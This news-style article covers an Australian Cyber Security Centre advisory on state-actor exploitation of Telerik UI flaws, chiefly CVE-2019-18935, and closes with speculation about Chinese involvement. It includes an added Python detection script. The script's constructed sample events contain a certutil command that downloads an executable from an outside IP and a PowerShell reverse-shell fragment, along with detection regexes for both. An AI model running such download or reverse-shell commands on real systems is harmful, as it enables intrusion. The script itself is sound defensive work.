A recent report from the Australian Cyber Security Centre (ACSC) describes a vulnerability that has also been exploited in cryptojacking attacks. The security body said on June 19 that a group of ‘state actors’ had compromised various Australian networks, and that in the course of those intrusions the attackers exploited a vulnerability that cryptojacking malware campaigns have been abusing as well.
According to the 48-page report released on June 24, the threat actors exploited four critical vulnerabilities in Telerik UI, a widely deployed ASP.NET web control library. One of them, CVE-2019-18935 (an insecure .NET deserialization flaw that gives remote code execution on the web server), was recently leveraged by the Blue Mockingbird gang, which used it to infect thousands of systems with the Monero (XMR) miner XMRig.
Weakness Mainly Used For Cryptojacking Activities
Although the advisory does not say whether the attackers installed cryptojacking malware in the recent campaign, that vulnerability is a favoured entry point for cybercriminals installing crypto-mining software on corporate networks.
The report expounds on CVE-2019-18935. Notably, the exploitation it describes has several similarities with the Blue Mockingbird attacks. Nonetheless, it does not suggest that that gang participated in the campaign against Australia:
“Other exploit payloads were identified by the ACSC most commonly when the actor’s attempt at a reverse shell was unsuccessful. These included: a payload that attempted to execute a PowerShell reverse shell; a payload that attempted to execute certutil.exe to download another payload; the payload that executed binary malware (identified in this advisory as HTTPCore) previously uploaded by the actor but which had no persistence mechanism; a payload that enumerated the absolute path of the web root and wrote that path to a file within the web root.”
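The payload behaviours in the quote above (a web-server worker process spawning a shell, certutil.exe fetching a second stage, a PowerShell reverse shell, a shell writing the web-root path into the web root) are all visible in ordinary endpoint and web-server telemetry. The script below is an added example, not code from the advisory: it runs three detection checks over constructed Sysmon-style process-creation events and constructed W3C IIS log lines. The field names (ParentImage, Image, CommandLine, the IIS column order) are assumed, every sample line is made up, and the request pattern `Telerik.Web.UI.WebResource.axd?type=rau` is the RadAsyncUpload handler that CVE-2019-18935 is reached through, a detail the quoted advisory text itself does not state.

```python
import re

# Constructed Sysmon-style process-creation events (not real telemetry).
# Events 0, 1 and 3 mirror behaviours in the ACSC quote; event 2 is benign.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c certutil.exe -urlcache -split -f http://203.0.113.10/a.exe C:\Windows\Temp\a.exe"},
    {"ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c \"$c=New-Object Net.Sockets.TCPClient('203.0.113.10',4444)\""},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\backup.ps1"},
    {"ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c echo %CD% > C:\inetpub\wwwroot\webroot.txt"},
]

# Constructed W3C IIS log lines (assumed default field order); the two
# requests to the RadAsyncUpload handler are the CVE-2019-18935 attack surface.
SAMPLE_IIS_LOG = [
    "#Software: Microsoft Internet Information Services 10.0",
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken",
    "2020-06-19 10:00:01 10.0.0.5 GET /Default.aspx - 443 - 198.51.100.7 Mozilla/5.0 - 200 0 0 15",
    "2020-06-19 10:00:05 10.0.0.5 GET /Telerik.Web.UI.WebResource.axd type=rau 443 - 203.0.113.10 python-requests/2.23 - 200 0 0 12",
    "2020-06-19 10:00:07 10.0.0.5 POST /Telerik.Web.UI.WebResource.axd type=rau 443 - 203.0.113.10 python-requests/2.23 - 200 0 0 1320",
]

WEB_WORKERS = ("w3wp.exe",)                       # IIS application pool worker
SHELLS = ("cmd.exe", "powershell.exe", "pwsh.exe")
# certutil used as a downloader: any invocation carrying -urlcache
CERTUTIL_DOWNLOAD = re.compile(r"certutil(\.exe)?\s.*-urlcache\b", re.I)
# Common reverse-shell / encoded-command markers in a PowerShell command line
PS_REVERSE_SHELL = re.compile(r"Net\.Sockets\.TCPClient|-EncodedCommand\b|\s-e(nc)?\s", re.I)


def _basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify_event(event):
    """Return the names of the detection rules this process event triggers."""
    hits = []
    parent = _basename(event.get("ParentImage", ""))
    image = _basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    # A web worker should never spawn an interactive shell; this alone catches
    # the reverse-shell, certutil and web-root enumeration payloads.
    if parent in WEB_WORKERS and image in SHELLS:
        hits.append("web_worker_spawns_shell")
    if CERTUTIL_DOWNLOAD.search(cmdline):
        hits.append("certutil_download")
    if image in ("powershell.exe", "pwsh.exe") and PS_REVERSE_SHELL.search(cmdline):
        hits.append("powershell_reverse_shell")
    return hits


def scan_events(events):
    """(index, rules) for every event that triggers at least one rule."""
    return [(i, classify_event(e)) for i, e in enumerate(events) if classify_event(e)]


IIS_FIELDS = ("date", "time", "s-ip", "cs-method", "cs-uri-stem", "cs-uri-query",
              "s-port", "cs-username", "c-ip", "cs(User-Agent)", "cs(Referer)",
              "sc-status", "sc-substatus", "sc-win32-status", "time-taken")


def parse_iis_line(line):
    """Parse one W3C IIS log line into a dict; None for comments or malformed lines."""
    parts = line.split()
    if line.startswith("#") or len(parts) != len(IIS_FIELDS):
        return None
    return dict(zip(IIS_FIELDS, parts))


def telerik_rau_requests(lines):
    """(method, client ip, status) for every request to the RadAsyncUpload handler."""
    found = []
    for line in lines:
        rec = parse_iis_line(line)
        if rec is None:
            continue
        if (rec["cs-uri-stem"].lower().endswith("telerik.web.ui.webresource.axd")
                and "type=rau" in rec["cs-uri-query"].lower()):
            found.append((rec["cs-method"], rec["c-ip"], rec["sc-status"]))
    return found


if __name__ == "__main__":
    for idx, rules in scan_events(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(rules)}")
    for method, ip, status in telerik_rau_requests(SAMPLE_IIS_LOG):
        print(f"RadAsyncUpload request: {method} from {ip} -> HTTP {status}")
```

The first rule is the one worth deploying as a high-confidence alert: an IIS worker process has no business launching cmd.exe or PowerShell, whatever the command line says, so it catches the advisory's reverse-shell, certutil and web-root enumeration payloads without knowing their exact strings. The IIS check is a triage aid rather than proof of compromise, since legitimate RadAsyncUpload traffic also hits that handler; what matters is correlating a request to it with a shell spawned by w3wp.exe moments later.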
Did Chinese State-Backed Hackers Launch The Attack?
About ten Chinese hacking groups have the PlugX malware in their arsenal. These groups engage in espionage and reportedly have strong ties to China’s government. PlugX was among the malware identified in the Australian government’s report.
Several Australian officials believe that China could be behind the massive cyberattack, citing the diplomatic tensions that have been rising between the two countries.
It is believed that the attack may have followed Australia’s call for an investigation into the origin of the COVID-19 virus. That call was not well received by Chinese officials, who termed it a ‘discriminatory’ accusation and responded swiftly with trade retaliation against Australia. The Chinese government has, however, denied the hacking claims.